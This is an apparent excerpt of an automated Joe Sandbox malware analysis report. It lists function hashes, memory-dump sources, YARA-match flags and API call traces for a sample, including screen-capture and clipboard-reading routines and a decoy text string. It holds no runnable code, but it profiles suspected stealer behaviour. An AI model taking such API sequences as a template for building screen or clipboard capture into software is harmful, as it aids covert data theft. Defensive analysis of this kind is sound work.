• Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d972d5f6bf83fc1fbb28b5c84e3d412aead65e6406980f05e21c5a5987f5aa75
                                              • Instruction ID: 024b6883eff8f8ea29a23b6f3684e3636c0b4e0faccfb1db06baa1303be78cee
                                              • Opcode Fuzzy Hash: d972d5f6bf83fc1fbb28b5c84e3d412aead65e6406980f05e21c5a5987f5aa75
                                              • Instruction Fuzzy Hash: 86118174244B418BE3298F24C0A0BF7BBF2BB96305F54866CC4EB07781CB3C690A8B44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 60307151c0980ebc0103b8501685fb21cb6da0661d3dc8dd653f85bd7399de0c
                                              • Instruction ID: 4a56926f5064d0e01617ea015dc43c0cf8acb0e629586e5e09ed6bc134417936
                                              • Opcode Fuzzy Hash: 60307151c0980ebc0103b8501685fb21cb6da0661d3dc8dd653f85bd7399de0c
                                              • Instruction Fuzzy Hash: 76317AB2640B128FD728CF25C4A0BA3B7E2FB41314F56C96EC5968B740E739E846CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                              • Instruction ID: bb5ad876f6fd136fa5b717418c5b28c03bd092fc74926325ccb3d2a12d4d699a
                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                              • Instruction Fuzzy Hash: 8D11A533A051D48EC3168D3C9400565BFE30AB3635F6987AAF4F89B2D2D6278D8A8355
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                              • Instruction ID: 3f1f406aaf6884ef1c2b1316db786b83ae1fd839c6e5d95eab63c74ccc11fb1b
                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                              • Instruction Fuzzy Hash: 1711E933B051F40EC3169D3D9400565BFE30AA3235B9983DAF4B89B2D6D6279D8B8359
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814752389.00000000007DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 007DF000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7df000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction ID: 2305593f8f166b828cf2417a868dff38b60677dc704e86e5b93e3db46e627d14
                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction Fuzzy Hash: 2C11A172340100AFDB54DF55DCD1FA673EAEB89320B29816AED09CB316E679EC02C760
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d97c06c808f995503ef165c8b5590b4792bf3abccac3f4aedaa766f8e3724533
                                              • Instruction ID: f427f1b3162d0f4f5ae2c5172da3ba7d3891ea5f2aff128e10ce9ce5c2c343ce
                                              • Opcode Fuzzy Hash: d97c06c808f995503ef165c8b5590b4792bf3abccac3f4aedaa766f8e3724533
                                              • Instruction Fuzzy Hash: 74018E728083549BD3208F14C8407A6F3E6FF86314F098A1DD99893280E775D850CB86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 64a90ef52bf475474ca84d97f47dd24732a8c514ed0f88711fffd97eb0e820f1
                                              • Instruction ID: 6de2bc702ef2c4b3c3fec6b76251391947271b0370208ebd5c475cd2b0f7e4cb
                                              • Opcode Fuzzy Hash: 64a90ef52bf475474ca84d97f47dd24732a8c514ed0f88711fffd97eb0e820f1
                                              • Instruction Fuzzy Hash: BE112A74641B438BD3248F15C4A1B66F7F2BB45310F54C95CD0AA87BA4CB79F8558F44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 64a90ef52bf475474ca84d97f47dd24732a8c514ed0f88711fffd97eb0e820f1
                                              • Instruction ID: 7f0e56f0b1c69548e80aad99ce6448e125aac4178c551feb6d87d6dcb2445d76
                                              • Opcode Fuzzy Hash: 64a90ef52bf475474ca84d97f47dd24732a8c514ed0f88711fffd97eb0e820f1
                                              • Instruction Fuzzy Hash: 10115770601B038BD3258F15C494B5AF7F2BB4A320F04C86DC4AA87BA4CB78F8A58F44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction ID: 4abe33874204280607049c3fe1d50a54ae18a97c1e974f731f868581595d7917
                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction Fuzzy Hash: AB0184766027448FEB21CF65CC04BEA33A6EF85315F4544B5D506D7245E7B4A9818F90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d8f68d369e7ef6a286e40a6763a3c57ceaab58be53d6a2bff1db9ef5993c4d76
                                              • Instruction ID: 7d195fc0cc089a1b371d1605b5b7fc724bb9568c11a35f783f11721ab6bc446b
                                              • Opcode Fuzzy Hash: d8f68d369e7ef6a286e40a6763a3c57ceaab58be53d6a2bff1db9ef5993c4d76
                                              • Instruction Fuzzy Hash: 32E0C276B467A10BA718CD364CA05F7ABE35A8B222B0CA86DD4A1D3208C239C8444254
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d8f68d369e7ef6a286e40a6763a3c57ceaab58be53d6a2bff1db9ef5993c4d76
                                              • Instruction ID: f00ac39425705d89eeb181f6c2b41ad52ac95c10a91ed515e4b0caef5fb98ff3
                                              • Opcode Fuzzy Hash: d8f68d369e7ef6a286e40a6763a3c57ceaab58be53d6a2bff1db9ef5993c4d76
                                              • Instruction Fuzzy Hash: EBE0C266B157620BA718CD754CA02B7A7E66AC7222B0CE47EE492E3208C23CC8054258
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 6bc8c52bd66dcd519f4b7cff64bde9b075be316ae7bfbf06a5329a9c7be22862
                                              • Instruction ID: db4289fb95c2d883f5511a4420c5907ee1ea51cf4e1cac9a923ad84023f1763f
                                              • Opcode Fuzzy Hash: 6bc8c52bd66dcd519f4b7cff64bde9b075be316ae7bfbf06a5329a9c7be22862
                                              • Instruction Fuzzy Hash: 38E08C70A41B40BFD218CFA0EC02FB2B379EF92200F044439EA8A622A1E63168658708
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: c6be85fbcb967b5a38600a5990a03cca286fcef500c809a7edcd9b2a03ee61c1
                                              • Instruction ID: 2f0908604cbf7bfc324d7bf4ea73bceb78c5f29e901124922c84879c2e3d6199
                                              • Opcode Fuzzy Hash: c6be85fbcb967b5a38600a5990a03cca286fcef500c809a7edcd9b2a03ee61c1
                                              • Instruction Fuzzy Hash: 27E0CD759417047FD624CF50DC01F727375EB56308F04543DE68A72251D5307425870C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c6e14ba30c33f90d765c1ec563710c4a7a5ff3eb934f93155409b896f51693d2
                                              • Instruction ID: 778083da1b7a2b515e6a4712ae3bcdee8fa5d715636e501e731374629f202eb4
                                              • Opcode Fuzzy Hash: c6e14ba30c33f90d765c1ec563710c4a7a5ff3eb934f93155409b896f51693d2
                                              • Instruction Fuzzy Hash: 9FC01220E9021056D12C8B30AC82B25A17A4B46909E1070169103232D286B0D002464C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c6e14ba30c33f90d765c1ec563710c4a7a5ff3eb934f93155409b896f51693d2
                                              • Instruction ID: 778083da1b7a2b515e6a4712ae3bcdee8fa5d715636e501e731374629f202eb4
                                              • Opcode Fuzzy Hash: c6e14ba30c33f90d765c1ec563710c4a7a5ff3eb934f93155409b896f51693d2
                                              • Instruction Fuzzy Hash: 9FC01220E9021056D12C8B30AC82B25A17A4B46909E1070169103232D286B0D002464C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83ea8713fea02ee1d663e68ddf9fd736f64b10a3c2a322e4372c059a27f25aba
                                              • Instruction ID: 06a09c019be1e1ca589dc157d897521be36447953cc7d9d4c377344bc1c8fc1f
                                              • Opcode Fuzzy Hash: 83ea8713fea02ee1d663e68ddf9fd736f64b10a3c2a322e4372c059a27f25aba
                                              • Instruction Fuzzy Hash: 24C0122494D1818BD359CF15C8E1571BBA5E91310070D619DC4C65B517E1109049C75E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 65ec34986bd23098427838e0e754d121ca1b24bca562092dea77e56c4ff8c57a
                                              • Instruction ID: ce2d38b2b6366e3980e295ce8cca058e728ebe04bc7c651e416cd396a1c36e46
                                              • Opcode Fuzzy Hash: 65ec34986bd23098427838e0e754d121ca1b24bca562092dea77e56c4ff8c57a
                                              • Instruction Fuzzy Hash: B7C08CB8A0524087D188EB18AC8243262696A03300F203038850BE3202DC20D060864C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83ea8713fea02ee1d663e68ddf9fd736f64b10a3c2a322e4372c059a27f25aba
                                              • Instruction ID: 06a09c019be1e1ca589dc157d897521be36447953cc7d9d4c377344bc1c8fc1f
                                              • Opcode Fuzzy Hash: 83ea8713fea02ee1d663e68ddf9fd736f64b10a3c2a322e4372c059a27f25aba
                                              • Instruction Fuzzy Hash: 24C0122494D1818BD359CF15C8E1571BBA5E91310070D619DC4C65B517E1109049C75E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 65ec34986bd23098427838e0e754d121ca1b24bca562092dea77e56c4ff8c57a
                                              • Instruction ID: 0393f226880c67d677c449cc4752047ba145325606724840d925ac9181fefd95
                                              • Opcode Fuzzy Hash: 65ec34986bd23098427838e0e754d121ca1b24bca562092dea77e56c4ff8c57a
                                              • Instruction Fuzzy Hash: 7DC08CB8A0410083C5C8EB18AC8243262686A03208F20303D8607F3642CC30D0208A4D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2c692fef42be145deae4456ee4ac28b6ac25c621fa9d6ff9ed2ae3db28027d6d
                                              • Instruction ID: bc1441c736d092f3f27a08f7ef17a15652b1e94d70ae04ea701d7088df2cc72e
                                              • Opcode Fuzzy Hash: 2c692fef42be145deae4456ee4ac28b6ac25c621fa9d6ff9ed2ae3db28027d6d
                                              • Instruction Fuzzy Hash: DFB09238F850068B8208CF08D8A1474E3B1F74F219B4575388CE3E3290CD20D806890C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2c692fef42be145deae4456ee4ac28b6ac25c621fa9d6ff9ed2ae3db28027d6d
                                              • Instruction ID: bc1441c736d092f3f27a08f7ef17a15652b1e94d70ae04ea701d7088df2cc72e
                                              • Opcode Fuzzy Hash: 2c692fef42be145deae4456ee4ac28b6ac25c621fa9d6ff9ed2ae3db28027d6d
                                              • Instruction Fuzzy Hash: DFB09238F850068B8208CF08D8A1474E3B1F74F219B4575388CE3E3290CD20D806890C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: afd82a99ac755fdc3a533a1e7986aac535729308fea22b07fc31ccd5e3c7b486
                                              • Instruction ID: 8a4a371dd7c1786c8fe760e8e08cf405fa5077d2ebc488ab8bf478ce10c7892f
                                              • Opcode Fuzzy Hash: afd82a99ac755fdc3a533a1e7986aac535729308fea22b07fc31ccd5e3c7b486
                                              • Instruction Fuzzy Hash: F7B09239A69040878208DF04EA91830B3B8E7A7304B0430289282E3266CD32E420CA4C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 43d8f41d80c62da231521e97de38f51167f84035e5cee915eaced784e260e6d8
                                              • Instruction ID: 3fd801eec03e02d39b20a8ca89e0c86b8ca26c68863f9e599adbbcbbde4db169
                                              • Opcode Fuzzy Hash: 43d8f41d80c62da231521e97de38f51167f84035e5cee915eaced784e260e6d8
                                              • Instruction Fuzzy Hash: D7B012259680404281088F00D851430A238E6A3304F0030284183E3063CC31D020C60C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetDC.USER32(00000000), ref: 0070B405
                                              • GetCurrentObject.GDI32(00000000,00000007), ref: 0070B426
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0070B436
                                              • DeleteObject.GDI32(00000000), ref: 0070B44D
                                              • CreateCompatibleDC.GDI32(00000000), ref: 0070B454
                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0070B462
                                              • SelectObject.GDI32(00000000,00000000), ref: 0070B46E
                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 0070B491
                                              • SelectObject.GDI32(00000000,00000000), ref: 0070B499
                                              • DeleteDC.GDI32(00000000), ref: 0070B4A0
                                              • ReleaseDC.USER32(00000000,00000000), ref: 0070B4A9
                                              • DeleteObject.GDI32(00000000), ref: 0070B4B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Object$Delete$CompatibleCreateSelect$BitmapCurrentRelease
                                              • String ID: Qp$Qp
                                              • API String ID: 1725296429-1053766494
                                              • Opcode ID: 8fa0317cbb1f235bf63e6316c6b3c27b168894cc8a4fa074e40fe7e36b03dc68
                                              • Instruction ID: f54efbe70d01e80acca420d4f96a3a0cba323340c53da5fefc1411cf757e91d7
                                              • Opcode Fuzzy Hash: 8fa0317cbb1f235bf63e6316c6b3c27b168894cc8a4fa074e40fe7e36b03dc68
                                              • Instruction Fuzzy Hash: 98215732504304AFE3009FA09C49F6F7BE8FFC9782F005429FB85922A0D77499018BEA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 007006DA
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0070070E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: V107$_)M/$_-Z3$b%K+
                                              • API String ID: 237503144-3840097723
                                              • Opcode ID: 3ee8f93103cab64fccbfb46bca4c52ffa13883f6957401afda7eb6def4c8019d
                                              • Instruction ID: a7efa8f8316a131e0d765e2df6fd95ea5848b404472b961d0786dcb912936bf8
                                              • Opcode Fuzzy Hash: 3ee8f93103cab64fccbfb46bca4c52ffa13883f6957401afda7eb6def4c8019d
                                              • Instruction Fuzzy Hash: F9A1F2B1140F10CBD32ACF24C5A4B97BBE2BF49B14F504A1DD9AB8BA91D775B406CB84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00420473
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 004204A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: V107$_)M/$_-Z3$b%K+
                                              • API String ID: 237503144-3840097723
                                              • Opcode ID: 415396783fcf33fd62c8bdbf907285ad325f08c277288e8db70e6241533ae13a
                                              • Instruction ID: 7466cd2c268fc972bfc07d1a477bb0991477af1b0ae2b0464136dea7a275457c
                                              • Opcode Fuzzy Hash: 415396783fcf33fd62c8bdbf907285ad325f08c277288e8db70e6241533ae13a
                                              • Instruction Fuzzy Hash: C5A10571240F148BD326CF24C6A4B97BBE1FF49714F904A1DD6AB4BA91D774B406CB84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$Global$CloseDataOpenWire
                                              • String ID:
                                              • API String ID: 1198520892-3916222277
                                              • Opcode ID: cea0a327820102340c8f955b3794ac00dd49388d72f97b56df99a0b6a7389256
                                              • Instruction ID: a5760ecca98f2f97b6b899a5cc04f784dbabe69278403c1bc4f7782556b1a8aa
                                              • Opcode Fuzzy Hash: cea0a327820102340c8f955b3794ac00dd49388d72f97b56df99a0b6a7389256
                                              • Instruction Fuzzy Hash: E541467180C381DBC7109B28848865EFFE0EB96364F591B5DF8E5572D2C3389A49CBA7
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041C108
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 0041C139
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: M3
                                              • API String ID: 237503144-1098715678
                                              • Opcode ID: 64ea4e8046676ed8e9fc3ac0e64fc677348dbb62c249d565b03b54e58056c842
                                              • Instruction ID: 11f51877d1175f535d645effb319d41d797b5f81760811a065eadd595d4e7ea0
                                              • Opcode Fuzzy Hash: 64ea4e8046676ed8e9fc3ac0e64fc677348dbb62c249d565b03b54e58056c842
                                              • Instruction Fuzzy Hash: 1551A8B15007009FD724CF29C884B62BBB5EF89314F158A9CE8A68F7A6D734E845CB85
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 006FC36F
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 006FC3A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: M3
                                              • API String ID: 237503144-1098715678
                                              • Opcode ID: e439e8e007a730ace2bebfbbfbfcc69ded4fd3001a084339053002973a781b8d
                                              • Instruction ID: 9b95a05d8ff8eeb1802c690ea79df6a55cfb5b94723a029bedae6d3e20a841f7
                                              • Opcode Fuzzy Hash: e439e8e007a730ace2bebfbbfbfcc69ded4fd3001a084339053002973a781b8d
                                              • Instruction Fuzzy Hash: E351ADB11007059FD724CF25C994B227BB6FF85324F158A9CE8A68F7A6D775E805CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Strings
                                              • How to Talk to Your Cat About Gun Safety. Do you love your cat? Well, no self-respecting cat mom or dad would let their baby grow up without a solid grounding in gun safety., xrefs: 006E935A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: How to Talk to Your Cat About Gun Safety. Do you love your cat? Well, no self-respecting cat mom or dad would let their baby grow up without a solid grounding in gun safety.
                                              • API String ID: 621844428-3219661580
                                              • Opcode ID: 29dfed9965a319fe24048995b90e2def5f861019178d281272e2979116696abc
